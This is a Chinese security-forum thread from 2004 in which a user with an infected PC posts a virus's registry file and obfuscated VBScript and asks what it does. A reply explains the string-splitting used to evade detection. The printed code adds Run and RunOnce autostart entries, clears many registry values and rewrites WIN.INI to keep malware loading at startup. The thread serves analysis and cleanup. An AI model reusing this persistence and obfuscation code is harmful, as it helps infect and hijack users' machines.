|
 | 作者: zeng7071 [zeng7071]
 论坛用户 |
登录 |
| [-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run] [HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run] @="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer" [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] "LogFeil"="C:\\$NtUninstallQ8875736$\\WINSYS.vbs" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "LogFeil"="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer" "internat.exe"="internat.exe" "zwupdows"=- "win"=- "mwin"=- "intenet"=- "Inernet"=- "Internet"=- "iexpleror"=- "zxdows"=- "qwe"=- "win1"=- "winwin"=- "9i5zxdows"=- "9i5com01zxdows"=- "99zxdows"=- "syste"=- "intelnat.exe"=- "88zxdows"=- "Start Pagewin"=- "Start Page"=- "9i5comzxdows"=- "9q5zxdows"=- "999izxdows"=- "033zxdows"=- "8zxdows"=- "flash"=- "3zxdows"=- "interneet.exe"=- "u88y"=- "88u88"=- "u18"=- "u1881"=- "u1882"=- "u1883"=- "u1884"=- "u1885"=- "u1886"=- "u1887"=- "u1888"=- "system"=- "u188"=- "iexpler"=- "u1810"=- "WIN32"=- "W1N32"=- "Abank"=- "Ziplog"=- "SystemServices"=- "stup"=- "Services"=- "WJQ32"=- "syslog"=- Set sss = CreateObject("WSc" + "ript.Sh" + "ell") mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\" mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\" mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\" sss.RegWrite ""&mhk&"LogFeil","regedit -s C:\$NtUninstallQ8875736$\WINSYS.cer" sss.RegWrite ""&mhk&"internat.exe","internat.exe" sss.RegWrite ""&mhk&"zwupdows","12" sss.RegWrite ""&mhk&"win","12" sss.RegWrite ""&mhk&"mwin","12" sss.RegWrite ""&mhk&"internt","12" sss.RegWrite ""&mhk&"Inernet","12" sss.RegWrite ""&mhk&"Internet","12" sss.RegWrite ""&mhk&"iexpleror","12" sss.RegWrite ""&mhk&"zxdows","12" sss.RegWrite ""&mhk&"qwe","12" sss.RegWrite ""&mhk&"win1","12" sss.RegWrite ""&mhk&"intelnat.exe","12" sss.RegWrite ""&mhk&"u1888","12" sss.RegWrite ""&mhk&"intenet","12" sss.RegWrite ""&mhk&"9i5zxdows","12" sss.RegWrite ""&mhk&"9i5com01zxdows","12" sss.RegWrite ""&mhk&"99zxdows","12" sss.RegWrite ""&mhk&"88zxdows","12" sss.RegWrite ""&mhk&"Start Pagewin","12" sss.RegWrite ""&mhk&"Start Page","12" sss.RegWrite ""&mhk&"u188","12" sss.RegWrite ""&mhk&"9i5comzxdows","12" sss.RegWrite ""&mhk&"9q5zxdows","12" sss.RegWrite ""&mhk&"u1881","12" sss.RegWrite ""&mhk&"u1882","12" sss.RegWrite ""&mhk&"u1883","12" sss.RegWrite ""&mhk&"u1884","12" sss.RegWrite ""&mhk&"u1885","12" sss.RegWrite ""&mhk&"u1886","12" sss.RegWrite ""&mhk&"u1887","12" sss.RegWrite ""&mhk&"u88y", "12" sss.RegWrite ""&mhk&"flash", "12" sss.RegWrite ""&mhk&"999izxdows","12" sss.RegWrite ""&mhk&"033zxdows","12" sss.RegWrite ""&mhk&"syste","12" sss.RegWrite ""&mhc&"my","12" sss.RegWrite ""&mhk&"3zxdows","12" sss.RegWrite ""&mhk&"88u88","12" sss.RegWrite ""&mhk&"system","12" sss.RegWrite ""&mhk&"8zxdows","12" sss.RegWrite ""&mhk&"u18","12" sss.RegWrite ""&mhk&"interneet.exe","12" sss.RegWrite ""&mhk2&"RunOnce\", "12" sss.RegWrite ""&mhk&"iexpler", "12" sss.RegWrite ""&mhk&"u1810", "12" sss.RegWrite ""&mhk&"winwin", "12" sss.RegWrite ""&mhk&"WIN32", "12" sss.RegWrite ""&mhk&"W1N32", "12" sss.RegDelete ""&mhc&"" sss.RegDelete ""&mhk&"zwupdows" sss.RegDelete ""&mhk&"win" sss.RegDelete ""&mhk&"mwin" sss.RegDelete ""&mhk&"internt" sss.RegDelete ""&mhk&"inernet" sss.RegDelete ""&mhk&"Internet" sss.RegDelete ""&mhk&"u188" sss.RegDelete ""&mhk&"iexpleror" sss.RegDelete ""&mhk&"zxdows" sss.RegDelete ""&mhk&"qwe" sss.RegDelete ""&mhk&"win1" sss.RegDelete ""&mhk&"intelnat.exe" sss.RegDelete ""&mhk&"intenet" sss.RegDelete ""&mhk&"9i5zxdows" sss.RegDelete ""&mhk&"9i5com01zxdows" sss.RegDelete ""&mhk&"99zxdows" sss.RegDelete ""&mhk&"88zxdows" sss.RegDelete ""&mhk&"Start Pagewin" sss.RegDelete ""&mhk&"Start Page" sss.RegDelete ""&mhk&"9i5comzxdows" sss.RegDelete ""&mhk&"9q5zxdows" sss.RegDelete ""&mhk&"999izxdows" sss.RegDelete ""&mhk&"033zxdows" sss.RegDelete ""&mhk&"u1881" sss.RegDelete ""&mhk&"u1882" sss.RegDelete ""&mhk&"u1883" sss.RegDelete ""&mhk&"u1884" sss.RegDelete ""&mhk&"u1885" sss.RegDelete ""&mhk&"u1886" sss.RegDelete ""&mhk&"u1887" sss.RegDelete ""&mhk&"u88y" sss.RegDelete ""&mhk&"flash" sss.RegDelete ""&mhk&"88u88" sss.RegDelete ""&mhk&"interneet.exe" sss.RegDelete ""&mhk&"u18" sss.RegDelete ""&mhk&"u1888" sss.RegDelete ""&mhk&"system" sss.RegDelete ""&mhk&"3zxdows" sss.RegDelete ""&mhk&"8zxdows" sss.RegDelete ""&mhk&"syste" sss.RegDelete ""&mhk2&"RunOnce\" sss.RegDelete ""&mhk&"iexpler" sss.RegDelete ""&mhk&"u1810" sss.RegDelete ""&mhk&"winwin" sss.RegDelete ""&mhk&"WIN32" sss.RegDelete ""&mhk&"W1N32" Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject") myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI") if myfile14 then set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI") mywin=FSO2.ReadALL() l=Instr(mywin,"run=")-3 m=Instr(mywin,"load=")-1 n=Instr(mywin,"NullPort=")-3 FSO2.close if l>0 and m>0 and l>m then set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI") mywin2=FSO3.Read(l) FSO3.close set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI") mywin3=FSO4.Read(m) FSO4.close if n>0 and n>l then set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI") mywin4=FSO5.Read(n) FSO5.close mywin=Replace(mywin,mywin4,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.WriteLine "load=" FSO2.Write "run=" FSO2.Write mywin FSO2.close else mywin=Replace(mywin,mywin2,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.Write "load=" FSO2.Write mywin FSO2.close end if end if end if 能不能帮解释一下这个代表什么呢,我知道上面的那些,作用都是在启动过程中加载我中毒的那些文件,可是后面的就看不懂了,帮忙解释一下好吗 |
| 地主 发表时间: 04-05-18 09:56 |
 | 回复: hackgou [hackgou]  论坛用户 |
登录 |
|
一楼的兄弟主要说的是: sss和fso1,fso2,fso3这几个对象吧。 先看看: Set sss = CreateObject("WSc" + "ript.Sh" + "ell") 这就相当于Set sss = CreateObject("WScript.Shell");这下就简单了吧,写这个脚本的人多半是为了躲避防火墙的检测猜故意绕的这个弯的。 然后用 sss.RegWrite ""&mhk&"W1N32", "12" sss.RegDelete ""&mhc&"" 来操作注册表。 至于fso1,fso2,fso3也是类似的: Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject") 就等于: Set FSO = CreateObject("Scripting.SystemObject") 然后来使用FSO读写文件系统。 |
| B1层 发表时间: 04-05-18 11:10 |
| 回复: zeng7071 [zeng7071] 论坛用户 |
登录 |
|
"internat.exe"="internat.exe" "zwupdows"=- "win"=- "mwin"=- "intenet"=- "Inernet"=- "Internet"=- "iexpleror"=- "zxdows"=- "qwe"=- "win1"=- "winwin"=- "9i5zxdows"=- "9i5com01zxdows"=- "99zxdows"=- "syste"=- "intelnat.exe"=- "88zxdows"=- "Start Pagewin"=- "Start Page"=- "9i5comzxdows"=- "9q5zxdows"=- "999izxdows"=- "033zxdows"=- "8zxdows"=- "flash"=- "3zxdows"=- "interneet.exe"=- "u88y"=- "88u88"=- "u18"=- "u1881"=- "u1882"=- "u1883"=- "u1884"=- "u1885"=- "u1886"=- "u1887"=- "u1888"=- "system"=- "u188"=- "iexpler"=- "u1810"=- "WIN32"=- "W1N32"=- "Abank"=- "Ziplog"=- "SystemServices"=- "stup"=- "Services"=- "WJQ32"=- "syslog"=- 谢谢.楼上的朋友,那这些呢,这些后面用"-"这个的作用是什么呢 |
| B2层 发表时间: 04-05-19 11:43 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 一个病毒文件